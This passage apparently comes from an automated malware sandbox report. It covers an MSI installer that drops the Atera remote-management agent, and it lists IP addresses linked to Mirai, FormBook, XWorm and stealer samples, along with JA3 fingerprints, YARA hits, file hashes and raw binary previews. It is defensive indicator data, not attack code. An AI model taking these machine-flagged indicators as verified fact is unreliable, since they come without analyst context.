
                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      AMAZON-02USzgp.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                      • 13.245.101.151
                                                                                                                                                                                                                                                      santi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 13.248.169.48
                                                                                                                                                                                                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 13.248.169.48
                                                                                                                                                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 13.248.221.243
                                                                                                                                                                                                                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 13.248.169.48
                                                                                                                                                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 76.223.74.74
                                                                                                                                                                                                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 3.122.148.244
                                                                                                                                                                                                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 13.223.155.145
                                                                                                                                                                                                                                                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 18.243.54.8
                                                                                                                                                                                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 15.206.178.249
                                                                                                                                                                                                                                                      AMAZON-02USzgp.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                      • 13.245.101.151
                                                                                                                                                                                                                                                      santi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 13.248.169.48
                                                                                                                                                                                                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 13.248.169.48
                                                                                                                                                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 13.248.221.243
                                                                                                                                                                                                                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 13.248.169.48
                                                                                                                                                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 76.223.74.74
                                                                                                                                                                                                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 3.122.148.244
                                                                                                                                                                                                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 13.223.155.145
                                                                                                                                                                                                                                                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 18.243.54.8
                                                                                                                                                                                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 15.206.178.249

                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      CargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198

                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exesetup (1).msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                        BOMB-762.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                          LaudoBombeirosPDF.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                            1nzNNooNMS.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                              Le55bnMCON.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                z8yxMFhhZI.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                  kTbv9ZA2x0.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                    IwmwOaVHnd.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                      gaYiWz75kv.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                        e8gTT6OTKZ.msiGet hashmaliciousAteraAgentBrowse

                                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                                          C:\Config.Msi\6c6862.rbs

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):8867
                                                                                                                                                                                                                                                                          Entropy (8bit):5.66256969300573
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:vjWxz1ccbTOOeMeqD61X7r6IHfX7r6kAVv70HVotBVeZEmzmYpLAV77qGpY9rr:vKD2jHpHtiB2iw
                                                                                                                                                                                                                                                                          MD5:310674CE8E886312A648DAB2B230BD41
                                                                                                                                                                                                                                                                          SHA1:6BEB5357C8E0B78A171275F62856157976D29D9C
                                                                                                                                                                                                                                                                          SHA-256:BF397B6A9F44916E99378DF9910E58A3EF640F754430D2F72730396B3DF34D38
                                                                                                                                                                                                                                                                          SHA-512:2EAFB47469164981C2390DF46CEEE575940C6E19C419F7505657DB85BB6BBA48EA0F8FB31189B9F768166F53B01267B6618DB00697DBEFCF58AAE6E44C29FE56
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\6c6862.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:...@IXOS.@.....@.)xY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent!.Guidelines_for_Citizen_Safety.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@..

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):753
                                                                                                                                                                                                                                                                          Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                                                          MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                                                          SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                                                          SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                                                          SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallState

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):7466
                                                                                                                                                                                                                                                                          Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                                                          MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                                                          SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                                                          SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                                                          SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):145968
                                                                                                                                                                                                                                                                          Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                          MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                          SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                          SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                          SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: setup (1).msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: BOMB-762.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: LaudoBombeirosPDF.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 1nzNNooNMS.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Le55bnMCON.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: z8yxMFhhZI.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: kTbv9ZA2x0.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: IwmwOaVHnd.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: gaYiWz75kv.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: e8gTT6OTKZ.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.config

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1442
                                                                                                                                                                                                                                                                          Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                          MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                          SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                          SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                          SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3318832
                                                                                                                                                                                                                                                                          Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                          MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                          SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                          SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                          SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):215088
                                                                                                                                                                                                                                                                          Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                          MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                          SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                          SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                          SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):710192
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                          MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                          SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                          SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                          SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation.zip

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):384542
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999374626035649
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:6144:viqRTU5exRWDCtTLvL0XRFJE9A+BQlv9I+NBsNQvaNXvhGf1mzVeUXJLo:vil/DSLvAJ6CxBHmJXVpJLo
                                                                                                                                                                                                                                                                          MD5:4A09A87D2004DAC4B00687E9C9F15036
                                                                                                                                                                                                                                                                          SHA1:C78BB288E7A96642093ABE44CB9B7BBD3EC447BA
                                                                                                                                                                                                                                                                          SHA-256:2DBC8CF2592604C09793CBED61E0B072B1B1FFA375FB3C9ABCA83FA0E18AB9A5
                                                                                                                                                                                                                                                                          SHA-512:F555F5A0BB80514BC71BB33A77620D28A9E6715E538372AAA7F0500BC8D5BFE8511F5CA982E15304422479FF693E6F38510D6616A94580FC1B105DD2DA605EAA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:PK..-......9lY...}........=...AgentPackageAgentInformation/AgentPackageAgentInformation.exe....(...................,...1.9>ks'6.s+a.....q!b.N......C...... $..:-u.&.......@~...!s.....}...;.._.0.A.... S.....P...(/.Lc..v.!......CH....(..j..T..4m.ty...........;.uj.Dv2..m...`v._....?. ..W.....O.|.EgdF..vL.^../..?!e../eRs..{.[.m........q$0..o..%..2..._....IW`m>".~6.y....w....G.z.v..~.t.#.mg.l7..6#..W..........V..#..........l|.K..=.&q=3y.g..KL.x`.D.L.,..l..Qw...^lSr#\.=...`'&..A.>.ME`..!....g.z....A../........6.||..-.....,...I.3.n.P..%..}oZ.~.'..q]JY)...G]Z=.^..2..[c.t.O5DI.O.H..{>....+n.'...!..#z..(F.Ue."...#.........z....L..tLv.3.8?..t\-..h.e.S.^W.....W..z.....Y|....P.....&.6.\5cs..X....F.......~a...Z@5.@....}....o...8B.?...r.....kS....`iT.q-)8.~.YU....w.kh.]......V..OZEI..@...>.9.......B76.O...b.7.u..kh.L.$....Q...F2^.J.L.C<"m.c..X..-...XQ...P=2.e/.fA...8..a...z...w8W.^w-..[!....QI}:2.?..K....34....}"...........\.%.X.j@G..4...f....<..v@.`.w

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
